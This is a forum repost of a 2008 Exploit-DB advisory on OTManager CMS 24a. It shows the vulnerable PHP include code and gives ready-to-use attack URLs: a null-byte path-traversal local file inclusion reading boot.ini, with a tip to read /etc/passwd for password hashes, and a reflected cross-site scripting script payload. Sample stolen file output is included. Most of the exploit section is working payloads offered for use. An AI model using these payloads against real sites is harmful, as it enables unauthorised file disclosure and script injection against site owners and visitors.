Exploit OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5957
Проверка EDB
  1. Пройдено
Автор
CWH UNDERGROUND
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5202 cve-2008-5201
Дата публикации
2008-06-27
Код:
===========================================================
  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : OTManager CMS
 VERSION     : 24a Completo
 VENDOR      : http://www.otmanager.org/
 DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
 Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

   76:  if($_REQUEST['conteudo']==""){
   77:  require("Principal.php");
   78:  }else{
   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
   80:  echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>';
   81:  }else{
   82:       require($_REQUEST['conteudo'].".php");
   83:       }
   84:  }


---------
 Exploit
---------

#####
 LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]

   
    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.

#####
 XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
 POC Exploit
-------------

#####
 LFI
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00

#####
 XSS
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-27]
 
Источник
www.exploit-db.com

Похожие темы